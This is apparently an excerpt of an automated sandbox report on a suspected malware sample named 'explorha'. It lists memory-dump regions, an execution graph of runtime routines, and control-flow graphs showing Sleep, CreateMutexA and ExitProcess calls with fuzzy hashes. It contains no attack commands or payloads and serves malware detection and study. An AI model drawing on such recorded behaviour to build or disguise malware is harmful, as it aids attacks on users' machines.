                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                        • String ID: 8Bv$`Gv
                                                                                                                                                                                                                                        • API String ID: 3903695350-1396405441
                                                                                                                                                                                                                                        • Opcode ID: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
                                                                                                                                                                                                                                        • Instruction ID: d03ecb5a9f5dcac42f9a4a0f19f5e475cf2bda1515162e2575b73cb7eeab06bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78314F31604745DFEB21AE78D849BA677E9BF40350F208429E599E7292DF7DEC80CB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:0.9%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:207
                                                                                                                                                                                                                                        Total number of Limit Nodes:9
                                                                                                                                                                                                                                        execution_graph 10747 73ee4f 10748 73ee5c __dosmaperr 10747->10748 10749 73ee87 RtlAllocateHeap 10748->10749 10750 73ee9a __dosmaperr 10748->10750 10749->10748 10749->10750 10731 737cb9 10734 737b57 10731->10734 10735 737b65 __cftof 10734->10735 10736 737bb0 10735->10736 10739 737bbb 10735->10739 10738 737bba 10745 73b922 GetPEB 10739->10745 10741 737bc5 10742 737bda __cftof 10741->10742 10743 737bca GetPEB 10741->10743 10744 737bf2 ExitProcess 10742->10744 10743->10742 10746 73b93c __cftof 10745->10746 10746->10741 10508 70a326 10509 70a340 10508->10509 10510 70a362 shared_ptr 10508->10510 10509->10510 10511 70a41e 10509->10511 10520 719750 10510->10520 10517 7382fa 10511->10517 10514 70a3d3 10515 70a423 Sleep CreateMutexA 10516 70a45e 10515->10516 10535 738286 10517->10535 10519 738309 __cftof 10523 719794 10520->10523 10524 71976e 10520->10524 10521 71987e 10694 71a900 10521->10694 10523->10521 10526 7197e8 10523->10526 10527 71980d 10523->10527 10524->10514 10525 719883 10697 702380 10525->10697 10526->10525 10689 71ea77 10526->10689 10531 71ea77 RtlAllocateHeap 10527->10531 10532 7197f9 __cftof 10527->10532 10531->10532 10533 719860 shared_ptr 10532->10533 10534 7382fa RtlAllocateHeap 10532->10534 10533->10514 10534->10521 10541 73bde8 10535->10541 10537 738291 __cftof 10538 73829f 10537->10538 10539 738286 __cftof RtlAllocateHeap 10537->10539 10538->10519 10540 7382f6 10539->10540 10540->10519 10542 73bdf2 __dosmaperr 10541->10542 10544 73be0b 10542->10544 10552 73ee4f 10542->10552 10544->10537 10545 73be33 __dosmaperr 10546 73be3b __dosmaperr 10545->10546 10547 73be73 10545->10547 10556 73c415 10546->10556 10560 73babf 10547->10560 10551 73c415 __freea RtlAllocateHeap 10551->10544 10553 73ee5c __dosmaperr 10552->10553 10554 73ee87 RtlAllocateHeap 10553->10554 10555 73ee9a __dosmaperr 10553->10555 10554->10553 10554->10555 10555->10545 10557 73c420 10556->10557 10559 73c43b __dosmaperr 10556->10559 10557->10559 10564 738ba3 10557->10564 10559->10544 10561 73bb2d __dosmaperr 10560->10561 10567 73ba65 10561->10567 10563 73bb56 10563->10551 10565 73bde8 __dosmaperr RtlAllocateHeap 10564->10565 10566 738ba8 10565->10566 10566->10559 10568 73ba71 __cftof 10567->10568 10571 73bc46 10568->10571 10570 73ba93 __dosmaperr 10570->10563 10572 73bc7c __cftof 10571->10572 10573 73bc55 __cftof 10571->10573 10572->10570 10573->10572 10575 74097f 10573->10575 10576 7409ff 10575->10576 10579 740995 10575->10579 10577 740a4d 10576->10577 10580 73c415 __freea RtlAllocateHeap 10576->10580 10643 740af0 10577->10643 10579->10576 10582 7409c8 10579->10582 10587 73c415 __freea RtlAllocateHeap 10579->10587 10581 740a21 10580->10581 10583 73c415 __freea RtlAllocateHeap 10581->10583 10584 7409ea 10582->10584 10589 73c415 __freea RtlAllocateHeap 10582->10589 10585 740a34 10583->10585 10586 73c415 __freea RtlAllocateHeap 10584->10586 10588 73c415 __freea RtlAllocateHeap 10585->10588 10590 7409f4 10586->10590 10592 7409bd 10587->10592 10594 740a42 10588->10594 10595 7409df 10589->10595 10596 73c415 __freea RtlAllocateHeap 10590->10596 10591 740abb 10597 73c415 __freea RtlAllocateHeap 10591->10597 10603 74055c 10592->10603 10593 740a5b 10593->10591 10602 73c415 RtlAllocateHeap __freea 10593->10602 10599 73c415 __freea RtlAllocateHeap 10594->10599 10631 74065a 10595->10631 10596->10576 10601 740ac1 10597->10601 10599->10577 10601->10572 10602->10593 10604 74056d 10603->10604 10630 740656 10603->10630 10605 74057e 10604->10605 10606 73c415 __freea RtlAllocateHeap 10604->10606 10607 740590 10605->10607 10608 73c415 __freea RtlAllocateHeap 10605->10608 10606->10605 10609 73c415 __freea RtlAllocateHeap 10607->10609 10613 7405a2 10607->10613 10608->10607 10609->10613 10610 73c415 __freea RtlAllocateHeap 10612 7405b4 10610->10612 10611 7405c6 10615 7405d8 10611->10615 10616 73c415 __freea RtlAllocateHeap 10611->10616 10612->10611 10614 73c415 __freea RtlAllocateHeap 10612->10614 10613->10610 10613->10612 10614->10611 10617 7405ea 10615->10617 10618 73c415 __freea RtlAllocateHeap 10615->10618 10616->10615 10619 7405fc 10617->10619 10620 73c415 __freea RtlAllocateHeap 10617->10620 10618->10617 10621 74060e 10619->10621 10622 73c415 __freea RtlAllocateHeap 10619->10622 10620->10619 10623 740620 10621->10623 10624 73c415 __freea RtlAllocateHeap 10621->10624 10622->10621 10625 740632 10623->10625 10626 73c415 __freea RtlAllocateHeap 10623->10626 10624->10623 10627 740644 10625->10627 10628 73c415 __freea RtlAllocateHeap 10625->10628 10626->10625 10629 73c415 __freea RtlAllocateHeap 10627->10629 10627->10630 10628->10627 10629->10630 10630->10582 10632 740667 10631->10632 10633 7406bf 10631->10633 10634 740677 10632->10634 10635 73c415 __freea RtlAllocateHeap 10632->10635 10633->10584 10636 740689 10634->10636 10638 73c415 __freea RtlAllocateHeap 10634->10638 10635->10634 10637 74069b 10636->10637 10639 73c415 __freea RtlAllocateHeap 10636->10639 10640 7406ad 10637->10640 10641 73c415 __freea RtlAllocateHeap 10637->10641 10638->10636 10639->10637 10640->10633 10642 73c415 __freea RtlAllocateHeap 10640->10642 10641->10640 10642->10633 10644 740afd 10643->10644 10648 740b1c 10643->10648 10644->10648 10649 7406fb 10644->10649 10647 73c415 __freea RtlAllocateHeap 10647->10648 10648->10593 10650 7407d9 10649->10650 10651 74070c 10649->10651 10650->10647 10685 7406c3 10651->10685 10654 7406c3 __cftof RtlAllocateHeap 10655 74071f 10654->10655 10656 7406c3 __cftof RtlAllocateHeap 10655->10656 10657 74072a 10656->10657 10658 7406c3 __cftof RtlAllocateHeap 10657->10658 10659 740735 10658->10659 10660 7406c3 __cftof RtlAllocateHeap 10659->10660 10661 740743 10660->10661 10662 73c415 __freea RtlAllocateHeap 10661->10662 10663 74074e 10662->10663 10664 73c415 __freea RtlAllocateHeap 10663->10664 10665 740759 10664->10665 10666 73c415 __freea RtlAllocateHeap 10665->10666 10667 740764 10666->10667 10668 7406c3 __cftof RtlAllocateHeap 10667->10668 10669 740772 10668->10669 10670 7406c3 __cftof RtlAllocateHeap 10669->10670 10671 740780 10670->10671 10672 7406c3 __cftof RtlAllocateHeap 10671->10672 10673 740791 10672->10673 10674 7406c3 __cftof RtlAllocateHeap 10673->10674 10675 74079f 10674->10675 10676 7406c3 __cftof RtlAllocateHeap 10675->10676 10677 7407ad 10676->10677 10678 73c415 __freea RtlAllocateHeap 10677->10678 10679 7407b8 10678->10679 10680 73c415 __freea RtlAllocateHeap 10679->10680 10681 7407c3 10680->10681 10682 73c415 __freea RtlAllocateHeap 10681->10682 10683 7407ce 10682->10683 10684 73c415 __freea RtlAllocateHeap 10683->10684 10684->10650 10686 7406f6 10685->10686 10687 7406e6 10685->10687 10686->10654 10687->10686 10688 73c415 __freea RtlAllocateHeap 10687->10688 10688->10687 10690 702380 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 10689->10690 10691 71ea96 Concurrency::cancel_current_task 10690->10691 10701 734f3c 10690->10701 10691->10532 10722 71d849 10694->10722 10698 70238e Concurrency::cancel_current_task 10697->10698 10699 734f3c ___std_exception_copy RtlAllocateHeap 10698->10699 10700 7023c3 10699->10700 10702 734f49 ___std_exception_copy 10701->10702 10705 7023c3 10701->10705 10702->10705 10706 734f76 10702->10706 10707 73b811 10702->10707 10705->10532 10716 73a1c6 10706->10716 10708 73b81e 10707->10708 10710 73b82c 10707->10710 10708->10710 10714 73b843 10708->10714 10709 738ba3 __dosmaperr RtlAllocateHeap 10711 73b834 10709->10711 10710->10709 10719 7382ea 10711->10719 10713 73b83e 10713->10706 10714->10713 10715 738ba3 __dosmaperr RtlAllocateHeap 10714->10715 10715->10711 10717 73c415 __freea RtlAllocateHeap 10716->10717 10718 73a1de 10717->10718 10718->10705 10720 738286 __cftof RtlAllocateHeap 10719->10720 10721 7382f6 10720->10721 10721->10713 10725 71d7b3 10722->10725 10724 71d85a Concurrency::cancel_current_task 10728 7021e0 10725->10728 10727 71d7c5 10727->10724 10729 734f3c ___std_exception_copy RtlAllocateHeap 10728->10729 10730 702217 __floor_pentium4 10729->10730 10730->10727

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00737BBB Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 320 737bbb-737bc8 call 73b922 323 737bea-737bfc call 737bfd ExitProcess 320->323 324 737bca-737bd8 GetPEB 320->324 324->323 326 737bda-737be9 324->326 326->323
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00737BBA,?,?,?,?,?,00738C0E), ref: 00737BF6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                        • Opcode ID: 261c3ca6fc927b7e4d12d952ed3b28e692c7a493030ca2e8aa85e6b2b7f1b7fc
                                                                                                                                                                                                                                        • Instruction ID: 7632b83e58c2604968a9beb7962ef44efb7e4277bc8dc00c8a014e7d67aed436
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 261c3ca6fc927b7e4d12d952ed3b28e692c7a493030ca2e8aa85e6b2b7f1b7fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AE08CB044A20CEEEE397B68DC64EA87B7DEB51344F000410FA044A723CF29FC42C981
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709675 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 709675-709695 4 7096c3-7096df 0->4 5 709697-7096a3 0->5 6 7096e1-7096ed 4->6 7 70970d-70972c 4->7 8 7096a5-7096b3 5->8 9 7096b9-7096c0 call 71ecf8 5->9 10 709703-70970a call 71ecf8 6->10 11 7096ef-7096fd 6->11 12 70975a-70a3e6 call 719750 7->12 13 70972e-70973a 7->13 8->9 14 70a3ec 8->14 9->4 10->7 11->10 11->14 17 709750-709757 call 71ecf8 13->17 18 70973c-70974a 13->18 20 70a423-70a466 Sleep CreateMutexA 14->20 21 70a3ec call 7382fa 14->21 17->12 18->14 18->17 21->20
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: d9d54e9122cbb66ce08b1b18a02186262df6b1aa112b41e26c8611c473fa0248
                                                                                                                                                                                                                                        • Instruction ID: 5b1e02825f655073e93f042fe482b1d1e6a35f1dfb45498aa7f3f838db260426
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9d54e9122cbb66ce08b1b18a02186262df6b1aa112b41e26c8611c473fa0248
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF312672710204DBFB08DF78CC997ADFAA6AB86314F208318E515977D2D7BE99808791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709A14 Relevance: 3.1, APIs: 2, Instructions: 128sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 31 709a14-709a34 35 709a62-709a7e 31->35 36 709a36-709a42 31->36 37 709a80-709a8c 35->37 38 709aac-709acb 35->38 39 709a44-709a52 36->39 40 709a58-709a5f call 71ecf8 36->40 43 709aa2-709aa9 call 71ecf8 37->43 44 709a8e-709a9c 37->44 45 709af9-70a3e6 call 719750 38->45 46 709acd-709ad9 38->46 39->40 41 70a3fb 39->41 40->35 48 70a423-70a466 Sleep CreateMutexA 41->48 49 70a3fb call 7382fa 41->49 43->38 44->41 44->43 52 709adb-709ae9 46->52 53 709aef-709af6 call 71ecf8 46->53 49->48 52->41 52->53 53->45
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
